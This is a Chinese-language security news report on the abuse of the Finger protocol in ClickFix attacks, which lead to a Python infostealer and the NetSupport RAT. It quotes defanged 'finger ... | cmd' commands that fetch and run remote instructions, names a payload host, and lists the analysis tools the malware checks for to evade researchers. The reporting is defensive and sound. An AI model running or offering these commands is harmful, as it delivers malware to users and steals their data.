Finger协议遭滥用 沦为 ClickFix 恶意软件攻击工具

已有数十年历史的手指协议再次活跃起来。威胁行为者使用此协议获取远程指令并在Windows 设备上执行恶意操作。

过去，人们使用finger命令通过Finger协议在Unix和Linux系统中查询本地和远程用户信息。这个命令后来被添加到Windows系统中。尽管它仍然受到支持，但与几十年前的受欢迎程度相比，其使用率已大幅下降。

执行finger命令后，将返回用户的基本信息，包括登录名、用户名（如果在/etc/passwd中设置）、主目录、电话号码、上次活动时间等详细信息。

手指命令输出

近期，不少恶意攻击开始利用Finger协议，疑似通过“ClickFix攻击”获取指令并在设备上执行。

这并不是手指命令第一次被这样滥用。早在2020 年，研究人员就警告称，该命令已被用作“Living-off-the-Land 二进制文件（LOLBIN，合法系统工具滥用）”来下载恶意软件并逃避检测。

恶意滥用手指命令上个月，一名网络安全研究人员分享了一个批处理文件。文件执行后，会运行“finger [email protected][.]com”命令，从远程finger服务器获取指令，然后通过管道符传递给cmd.exe在本地执行。

手指命令输出

该服务器目前无法访问，但MalwareHunterTeam 发现了更多利用Finger 命令的恶意软件样本和攻击活动。例如，Reddit平台上的一名用户最近发布了警告，称遇到了伪装成验证码验证的ClickFix攻击——。攻击者诱导他运行Windows 命令以“证明他是人类”。

尽管服务器不再响应Finger 请求，但另一位Reddit 用户捕获了之前的输出。此类攻击使用Finger协议作为远程脚本传输工具：通过运行“finger [email protected][.]org”命令，将输出通过管道符传递给Windows命令处理器cmd.exe。

该操作将触发执行获取的指令：创建随机命名的路径，将curl.exe复制为随机文件名，通过重命名的curl程序从cloudmega[.]org下载伪装成PDF文件的压缩包，解压Python恶意包。

伪装为PDF 的文件内容

随后，系统会通过“pythonw.exe __init__.py”命令执行Python程序。最终执行的命令会向攻击者的服务器返回一条“执行成功”的确认消息，同时向用户显示一个假的“验证你是人类”提示框。

目前尚不清楚这个Python恶意软件包的具体用途，但从关联的批处理文件可以推断它应该是一个信息窃取工具。

安全人员还发现了另一个类似的攻击活动：通过“finger [email protected] | cmd”命令获取并执行指令。操作过程与上述ClickFix攻击几乎相同。

手指命令输出

分析发现，这种攻击方式较为成熟。 ——命令会首先检测设备中是否存在用于恶意软件研究的常用工具，如果发现，则攻击将被终止。这些工具包括filemon、regmon、procexp、procexp64、tcpview、tcpview64、Procmon、Procmon64、vmmap、vmmap64、portmon、processlasso、Wireshark、Fiddler Everywhere、Fiddler、ida、ida64、ImmunityDebugger、WinDump、x64dbg、x32dbg、OllyDbg 和ProcessHacker。

如果没有检测到恶意软件分析工具，该命令将下载伪装成PDF的压缩包并解压。但与之前不同的是，该压缩包不是Python恶意软件包，而是NetSupport Manager远程访问工具（RAT）安装包。

NetSupport 管理器RAT

然后，该命令配置计划任务以在用户登录时自动启动远程访问恶意软件。

目前，此类手指命令滥用活动似乎是由单个威胁参与者发起的，并且主要通过ClickFix 攻击来实施。但鉴于仍有用户继续受骗，相关攻击活动需高度警惕。

对于防御者来说，防止滥用Finger 命令的最佳方法是拦截到TCP 79 端口—— 的出站流量。该端口是Finger 协议用于连接守护程序的专用端口。